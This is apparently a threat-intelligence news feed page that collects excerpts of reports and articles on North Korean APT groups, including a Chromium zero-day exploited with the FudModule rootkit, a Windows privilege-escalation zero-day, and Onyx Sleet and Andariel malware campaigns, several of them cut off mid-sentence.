Malware Hack Vulnerability Threat Cloud APT 38 ★★
News.webp 2024-09-02 16:43:39 2022-2024 North Korea Citrine Sleet / Lazarus FUDMODULE (BYOVD) Rootkit Samples
(direct link)
Vulnerability Threat Conference APT 38 ★★
RiskIQ.webp 2024-08-29 19:44:20 Citrine Sleet exploiting Chromium zero-day
(direct link)
#### Targeted Industries - Financial Services ## Snapshot On August 19, 2024, Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium, now identified as [CVE-2024-7971](https://nvd.nist.gov/vuln/detail/CVE-2024-7971), to gain remote code execution (RCE). We assess with high confidence that the observed exploitation of CVE-2024-7971 can be attributed to a North Korean threat actor targeting the cryptocurrency sector for financial gain. Our ongoing analysis and observed infrastructure lead us to attribute this activity with medium confidence to [Citrine Sleet](https://security.microsoft.com/intel-profiles/740afa51582ebef367a7120efe99a535ba803f2169356580369a0fd680137145). We note that while the [FudModule](https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/) rootkit deployed in the attack has also been attributed to [Diamond Sleet](https://security.microsoft.com/intel-profiles/b982c8daf198d93a2ff52b92b65c6284243aa6af91dda5edd1fe8ec5365918c5), another North Korean threat actor, Microsoft previously identified shared infrastructure and tools between Diamond Sleet and Citrine Sleet, and our analysis indicates this might be shared use of the FudModule malware between these threat actors. Google released a [fix for the vulnerability](https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html) on August 21, 2024, and users should ensure they are using the latest version of Chromium. Microsoft Defender for Endpoint detects Citrine Sleet activity with the alert *Emerging threat activity group Citrine Sleet detected*. To further protect from this kind of attack, organizations should ensure that Google Chrome and Microsoft Edge are updated and follow Microsoft's recommendations below in strengthening the endpoint.
## Activity Overview On August 19, 2024, Microsoft identified a North Korean threat actor exploiting an RCE exploit in the Chromium browser that has since been designated CVE-2024-7971. Entities that we identified who were targeted through this vector are associated with the cryptocurrency sector. One of these organizations is also a previous target of Sapphire Sleet. CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine impacting versions of Chromium prior to 128.0.6613.84. Exploiting the vulnerability could allow threat actors to gain RCE in the sandboxed Chromium renderer process. Google released a fix for the vulnerability on August 21. CVE-2024-7971 is the third exploited V8 type confusion vulnerability that has been patched in V8 this year after [CVE-2024-4947](https://nvd.nist.gov/vuln/detail/CVE-2024-4947) and [CVE-2024-5274](https://nvd.nist.gov/vuln/detail/CVE-2024-5274). The attack used the typical stages seen in browser exploit chains. First, the targets were directed to the Citrine Sleet-controlled exploit domain *voyagorclub\[.\]space*. While we cannot confirm at this time how the targets were directed, social engineering is a common tactic used by Citrine Sleet. Once a target connected to the domain, the zero-day RCE exploit for CVE-2024-7971 was served. After the RCE exploit achieved code execution in the sandboxed Chromium renderer process, shellcode containing a Windows sandbox escape exploit and the FudModule rootkit was downloaded and then loaded into memory. The sandbox escape exploited [CVE-2024-38106](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38106), a vulnerability in the Windows kernel that Microsoft fixed on August 13, 2024, before we discovered this North Korean threat actor activity. 
CVE-2024-38106 was reported to Microsoft Security Response Center (MSRC) as being exploited; however, our investigations so far have not suggested any link between the reported CVE-2024-38106 exploit activity and this Citrine Sleet exploit activity, beyond exploiting the same vulnerability. This may suggest a "bug collision," where the same vulnerability is independentl Malware Tool Vulnerability Threat APT 38 ★★
SecureMac.webp 2024-08-29 10:04:45 Nukesped (direct link)
>also known as HEUR:Trojan-PSW.OSX.BeaverTail.a Type: Hybrid Threat Platform: Mac OS 9 Last updated: 07/31/24 3:52 pm Threat Level: High Description Nukesped, a hybrid threat attributed to the North Korean Lazarus Group, is an advanced cyber espionage tool designed to steal sensitive data and disrupt operations. Nukesped Threat Removal MacScan can detect and remove Nukesped Hybrid Threat from your system, as well as provide protection against other security and privacy threats. A 30-day trial is available to scan your system for this threat. Download MacScan
Tool Threat APT 38 ★★★
SecurityWeek.webp 2024-08-19 15:35:53 Windows Zero-Day Attack Linked to North Korea's Lazarus APT
(direct link)
>The vulnerability, tracked as CVE-2024-38193 and marked as 'actively exploited' by Microsoft, allows SYSTEM privileges on the latest Windows operating systems.
Vulnerability Threat APT 38 ★★
The_Hackers_News.webp 2024-08-19 12:35:00 Microsoft Patches Zero-Day Flaw Exploited by North Korea's Lazarus Group
(direct link)
A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea. The security vulnerability, tracked as CVE-2024-38193 (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock. "An attacker who successfully exploited this
Vulnerability Threat APT 38 ★★★
RiskIQ.webp 2024-07-24 23:34:10 Onyx Sleet uses array of malware to gather intelligence for North Korea
(direct link)
#### Targeted Geolocations - India - Korea - United States - Southeast Asia - North America #### Targeted Industries - Information Technology - Defense Industrial Base - Government Agencies & Services ## Snapshot On July 25, 2024, the United States Department of Justice (DOJ) indicted an individual linked to the North Korean threat actor that Microsoft tracks as Onyx Sleet. Microsoft Threat Intelligence collaborated with the Federal Bureau of Investigation (FBI) in tracking activity associated with Onyx Sleet. We will continue to closely monitor Onyx Sleet's activity to assess changes following the indictment. First observed by Microsoft in 2014, Onyx Sleet has conducted cyber espionage through numerous campaigns aimed at global targets with the goal of intelligence gathering. More recently, it has expanded its goals to include financial gain. This threat actor operates with an extensive set of custom tools and malware, and regularly evolves its toolset to add new functionality and to evade detection, while keeping a fairly uniform attack pattern. Onyx Sleet's ability to develop a spectrum of tools to launch its tried-and-true attack chain makes it a persistent threat, particularly to targets of interest to North Korean intelligence, like organizations in the defense, engineering, and energy sectors. Microsoft tracks campaigns related to Onyx Sleet and directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. ## Activity Overview ### Who is Onyx Sleet? Onyx Sleet conducts cyber espionage primarily targeting military, defense, and technology industries, predominately in India, South Korea, and the United States. This threat actor has historically leveraged spear-phishing as a means of compromising target environments; however, in recent campaigns, they have mostly exploited N-day vulnerabilities, leveraging publicly available and custom exploits to gain initial access.
In October 2023, Onyx Sleet [exploited the TeamCity CVE-2023-42793 vulnerability](https://security.microsoft.com/intel-explorer/articles/b4f39b04) [as a part of a targeted attack](https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2023-42793/overview). Exploiting this vulnerability enabled the threat actor to perform a remote code execution attack and gain administrative control of the server. Onyx Sleet develops and uses a spectrum of tools that range from custom to open source. They have built an extensive set of custom remote access trojans (RATs) that they use in campaigns, and routinely developed new variants of these RATs to add new functionality and implement new ways of evading detection. Onyx Sleet often uses leased virtual private servers (VPS) and compromised cloud infrastructure for command-and-control (C2).   Onyx Sleet is tracked by other security companies as SILENT CHOLLIMA, Andariel, DarkSeoul, Stonefly, and TDrop2.  **Affiliations with other threat actors originating from North Korea** Onyx Sleet has demonstrated affiliations with other North Korean actors, indicating its integration with a broader network of North Korean cyber operations. Microsoft has observed [an overlap](https://www.microsoft.com/en-us/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/) between Onyx Sleet and [Storm-0530](https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/). Both groups were observed operating within the same infrastructure and were involved in the development and use of ransomware in attacks in late 2021 and 2022.  **Onyx Sleet targets** In pursuit of its primary goal of intelligence collection, Onyx Sleet has focused on targeting entities in the defense and energy industries, predominately in India, South Korea, and the United States. 
Recent att Ransomware Malware Tool Vulnerability Threat Industrial Cloud Technical Commercial APT 38 ★★★
Mandiant.webp 2024-06-27 14:00:00 Global Revival of Hacktivism Requires Increased Vigilance from Defenders
(direct link)
Written by: Daniel Kapellmann Zafra, Alden Wahlstrom, James Sadowski, Josh Palatucci, Davyn Baumann, Jose Nazario
Since early 2022, Mandiant has observed the revival and intensification of threat activity from actors leveraging hacktivist tactics and techniques. This comes decades after hacktivism first emerged as a form of online activism and several years since many defenders last considered hacktivism to be a serious threat. However, this new generation of hacktivism has grown to encompass a more complex and often impactful fusion of tactics different actors leverage for their specific objectives. Today's hacktivists exhibit increased capabilities in both intrusion and information operations demonstrated by a range of activities such as executing massive disruptive attacks, compromising networks to leak information, conducting information operations, and even tampering with physical world processes. They have leveraged their skills to gain notoriety and reputation, promote political ideologies, and actively support the strategic interests of nation-states. The anonymity provided by hacktivist personas coupled with the range of objectives supported by hacktivist tactics have made them a top choice for both state and non-state actors seeking to exert influence through the cyber domain. This blog post presents Mandiant's analysis of the hacktivism threat landscape, and provides analytical tools to understand and assess the level of risk posed by these groups. Based on years of experience tracking hacktivist actors, their claims, and attacks, our insight is meant to help organizations understand and prioritize meaningful threat activity against their own networks and equities.
Figure 1: Sample of imagery used by hacktivists to promote their threat activity
Proactive Monitoring of Hacktivist Threats Necessary for Defenders to Anticipate Cyberattacks Mandiant considers activity to be hacktivism when actors claim to or conduct attacks with the publicly stated intent of engaging in political or social activism. The large scale of hacktivism's resurgence presents a critical challenge to defenders who need to proactively sift through the noise and assess the risk posed by a multitude of actors with ranging degrees of sophistication. While in many cases hacktivist activity represents a marginal threat, in the most significant hacktivist operations Mandiant has tracked, threat actors have deliberately layered multiple tactics in hybrid operations in such a way that the effect of each component magnified the others. In some cases, hacktivist tactics have been deliberately employed by nation-state actors to support hybrid operations that can seriously harm victims. As the volume and complexity of activity grows and new actors leverage hacktivist tactics, defenders must determine how to filter, assess, and neutralize a range of novel and evolving threats. The proactive moni
Malware Tool Threat Legislation Industrial Cloud Commercial APT 38 ★★★
RiskIQ.webp 2024-05-31 22:14:46 Analysis of APT Attack Cases Using Dora RAT Against Korean Companies (Andariel Group) (direct link) #### Targeted Geolocations - Korea #### Targeted Industries - Education - Critical Manufacturing ## Snapshot AhnLab Security Intelligence Center (ASEC) has identified attacks by the Andariel Group, tracked by Microsoft as Onyx Sleet, using a variety of malware to target South Korean educational institutions and construction and manufacturing organizations. Read Microsoft's [write-up on Onyx Sleet](https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0). ## Description The attacks analyzed by ASEC involved several types of malware, such as keyloggers, infostealers, proxy tools and remote access trojans (RATs). Nestdoor is a RAT that has been in use since May 2022. It allows attackers to execute commands, upload and download files, and perform reverse shell operations. Nestdoor has been used in various attacks, often exploiting vulnerabilities such as Log4Shell. In one case, the malware was disguised as an OpenVPN installer which, on execution, activated Nestdoor. Dora RAT is a custom malware strain identified in these attacks. Developed by the Andariel Group in the Go language, Dora RAT provides basic functionality such as reverse shell and file transfer. It can either run as a standalone executable or be injected into the explorer.exe process. Some versions of Dora RAT were signed with a legitimate certificate, increasing their perceived legitimacy.
Keyloggers and clipboard loggers were deployed to capture sensitive information from infected systems, storing the captured data in the "%temp%" directory. In addition, various proxy tools were used for data exfiltration. These tools included custom-developed proxies and open-source SOCKS5 proxies. One proxy tool shared similarities with those used by the Lazarus Group, tracked by Microsoft as [Diamond Sleet](https://security.microsoft.com/intel-profiles/b982c8daf198d93a2ff52b92b65c6284243aa6af91dda5edd1fe8ec5365918c5), ininte ## Detections/Hunting Queries **Microsoft Defender for Endpoint** Alerts with the following title in the security center can indicate threat activity on your network: - *Onyx Sleet activity group* ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Use [Microsoft Defender Vulnerability Management (MDVM)](https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management?view=o365-worldwide) to help identify potentially vulnerable assets that Onyx Sleet actors could exploit to gain a foothold in the network. - Use exposure management in [Microsoft Defender XDR](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=o365-worldwide) to identify potentially vulnerable assets and remediate potential security vulnerabilities that Onyx Sleet actors could exploit to gain a foothold in the network.
- Microsoft Defender customers can enable [attack surface reduction rules](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide&ocid=magicti_ta_learndoc) to prevent common attack techniques: - [Block](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-wor Malware Tool Vulnerability Threat APT 38 ★★
The_Hackers_News.webp 2024-05-29 16:05:00 Microsoft Uncovers 'Moonstone Sleet' - New North Korean Hacker Group
(direct link)
A never-before-seen North Korean threat actor codenamed Moonstone Sleet has been attributed as behind cyber attacks targeting individuals and organizations in the software and information technology, education, and defense industrial base sectors with ransomware and bespoke malware previously associated with the infamous Lazarus Group. "Moonstone Sleet is observed to set up fake companies and
Ransomware Malware Threat Industrial APT 38 ★★
Last update at: 2025-05-10 18:53:10